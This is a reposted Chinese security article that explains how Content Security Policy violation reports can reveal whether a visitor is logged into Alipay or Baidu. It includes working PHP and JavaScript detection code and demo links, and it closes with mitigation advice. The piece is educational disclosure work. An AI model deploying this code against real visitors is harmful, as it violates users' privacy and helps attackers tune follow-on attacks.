利用CSP探測網站登陸狀態(alipay/baidu為例)

wyzsk發表於2020-08-19
作者: phith0n · 2015/01/04 14:54

0x00 背景


今天看到zone裡有同學發帖說了探測支付寶登入狀態的帖子:http://zone.wooyun.org/content/17665

由此我想到了我們parsec的@/fd 半年前提到的一個思路,當時他給出了一個探測twitter是否登入的頁面,可是我那個時候才疏學淺,好像一直沒理解。這時候返回去看看,就有了這篇文章。

0x01 CSP簡介


內容安全策略(Content Security Policy,簡稱CSP)是一種以可信白名單作機制,來限制網站中是否可以包含某來源內容。預設配置下不允許執行內聯程式碼 <script> 塊內容,內聯事件,內聯樣式 ,以及禁止執行eval() , newFunction() , setTimeout([string], …) 和setInterval([string], …) 。

CSP更詳盡的介紹可以在drops看到:/tips/?id=1439

0x02 大環境介紹與原理


簡單瞭解一下CSP,我們知道CSP可以限制網站中可否包含某來源的內容。同時,csp還可以在頁面違反規則的時候傳送一個資料包,將具體細節通知給服務端。

我們再來想想像支付寶這種整合度很高的網站服務,當我們在未登入的情況下訪問alipay的某個子域名(如test.alipay.com),很可能是會302跳轉到一個使用者登陸專用的域名(如login.alipay.com)下要求使用者登入。而在已登入的情況下是不會跳轉的。

這就造成了一個登入/未登入的一個差別,主要差別如下:

  1. HTTP狀態碼(302和200)

  2. 最終訪問的域名(test.alipay.com和login.alipay.com)

因為瀏覽器SOP(同源策略)的限制,正常情況下我們是無法獲取到alipay域名下HTTP狀態碼的。

但結合CSP安全策略,我們卻可以簡單獲得第2個,也就是最終訪問域名。為什麼?

我前面說了CSP是可以限制頁面中允許載入哪些來源的內容的。所以,當我們將CSP設定為只接受來源為test.alipay.com的內容,那麼當載入來源為login.alipay.com的請求時就會被CSP策略拒絕,並可以將這個訪問report給服務端,我們透過report的內容就能判斷使用者訪問的是test還是login。 過程如下:

enter image description here

這就是原理,很讚的一個思路,再次崇拜一次@/fd。

0x03 以支付寶為例編寫探測程式碼


所以,根據上面的思路,我們第一步就是找到一個這樣的頁面:登入、未登入使用者訪問時到達的“域名”不相同。這裡的“域名”包括protocol和hostname,也就是說http://test.alipay.com和https://test.alipay.com是不同的域名。

像支付寶這種網站有很多這樣的頁面,因為支付寶的很多服務是登入使用者才能檢視的,而登入入口又只有那麼一個。

比如這個URL:https://my.alipay.com/portal/i.htm,當未登入使用者訪問的時候會跳轉到https://auth.alipay.com/login/index.htm,已登入使用者訪問時不會跳轉。

這時候我們將CSP的img-src限制為https://my.alipay.com,再將https://my.alipay.com/portal/i.htm作為img的src,這個時候就會出現一個有趣的現象:未登入的使用者訪問時,會觸發CSP規則。

因為未登入的使用者訪問時實際img載入的src是https://auth.alipay.com/login/index.htm,不符合CSP限制的img-src,自然就觸發規則了。 這時候我們在設定CSP的report-uri為report.php,不符合規則的請求會被記錄下作為日誌傳送到report.php裡:

enter image description here

不過瀏覽器在傳送這個report包的時候是不帶cookie的,所以伺服器那邊並不能直接判斷是哪個使用者傳送的report包,所以我們在report的GET引數裡帶上使用者的session id。

示例程式碼如下:

#!php
<?php
session_start();
$ssid = session_id();
header("Content-Security-Policy:img-src https://my.alipay.com; report-uri report.php?ssid={$ssid}");
?>
<html>
<head>
<meta charset="utf-8" />
<title>支付寶登陸檢測</title>
</head>
<body onload="return check();">
<img src="https://my.alipay.com/portal/i.htm">
<b id="result"></b>
<script type="text/javascript">
function check()
{
    with(new XMLHttpRequest) {
        open('GET', 'alipay.php');
        send();
        onreadystatechange = function() {
            if (readyState ^ 4) return;
            result.innerHTML = parseInt(responseText) > 0 ? '未登入' : '已登入';
        }
    }
}
</script>
</body>

report.php用來記錄:

#!php
<?php
session_start();
if (preg_match('/^[a-z0-9]*$/i', $_GET['ssid'])) {
    session_id($_GET['ssid']);
}else{
    exit;
}
$report = file_get_contents("php://input");
if (!empty($report)) {
    $_SESSION['nologin'] = 1;
}else{
    $_SESSION['nologin'] = 0;
}
?>

當接收到php://input的時候說明CSP傳送報告了,說明請求違反的CSP規則了,也就意味著使用者沒有登入,所以將session中的nologin設定為1。 然後在index.php裡用一個ajax來向alipay.php請求,實際上就是獲得$_SESSION[nologin]的值:

#!php
<?php
session_start();
echo isset($_SESSION['nologin']) ? $_SESSION['nologin'] : 0;
setcookie('PHPSESSID', '', time() - 10);
session_destroy();
?>

如上,獲取完後將session清除一下,以免影響下一次的判斷。

獲得值如果為1的話,說明沒有登入,如果為0說明已登入,就可以顯示出來或做任何其他操作了。

來個演示:http://mhz.pw/game/detect/alipay/

登入支付寶以後訪問,顯示“已登入”

enter image description here

換個瀏覽器,直接訪問則顯示“未登入”:

enter image description here

0x04 由http/https混用造成的問題(百度為例)


同樣的問題,不僅僅是支付寶存在,只要有“統一登入入口”的網站都可能出現這個問題,因為統一登入入口通常是一個單獨的域名。

還有一種情況,是http和https混用造成的。有些網站的登入頁面是https加密傳輸的,但登陸以後實際的操作頁面是走http。

這之間一樣存在一個跳轉的問題,當我們訪問一個登陸後才能看到的頁面如http://xxx.com/index,未登入的使用者就會跳轉到登入頁面,如https://xxx.com/login。

在CSP裡http和https是完全不同的兩個來源,所以也能觸發CSP規則。

比如https://passport.baidu.com,這是百度的安全中心。當已登入使用者訪問的時候會跳轉到“安全中心”首頁http://passport.baidu.com/center(注意,此處是http):

enter image description here

而未登入使用者訪問則會跳轉到https://passport.baidu.com/v2/?login(這時候是https):

enter image description here

雖然兩個域名都是passport.baidu.com,但因為protocol不同,混用的http和https就能夠影響CSP的攔截情況。

我們將CSP設定為img-src https://passport.baidu.com ,那麼img的src就只接受來源為https://passport.baidu.com的img,那麼已登入使用者訪問的http://passport.baidu.com/center就會被阻止,產生一個CSP報告。記錄下這個報告,一樣能判斷訪客是否已登入百度。

測試你是否登入百度:http://mhz.pw/game/detect/baidu/

0x05 影響及防範方法


嚴格來論,只是判斷使用者是否登入,這個問題並不算一個漏洞。當時@/fd將問題提交到推特之後推特的回應也是不算漏洞,但確實如果與其他一些漏洞結合使用,會讓某些漏洞的成功率提高一大截。所以我們可以將之歸為一個“奇技淫巧”。

這個問題更容易出現在一些大型網站、企業網路之中,往往這些網站的統一性和重用性都做的很好,所以往往登入入口只有一個(現在流行一個user center的概念),所以難免會出現一些跳轉的問題。有這些跳轉,就是探測使用者登入的基礎。

這個方法還有一個限制,就是使用者使用的瀏覽器需要是現代瀏覽器,需要支援CSP安全策略。如果你要探測的使用者還在用IE6~IE10,那麼是肯定不行的。 如何解決這個問題?如果你真的覺得這是個安全問題的話,那麼儘量避免跳轉,或者使用javascript進行頁面的跳轉。

本文章來源於烏雲知識庫,此映象為了方便大家學習研究,文章版權歸烏雲知識庫!

相關文章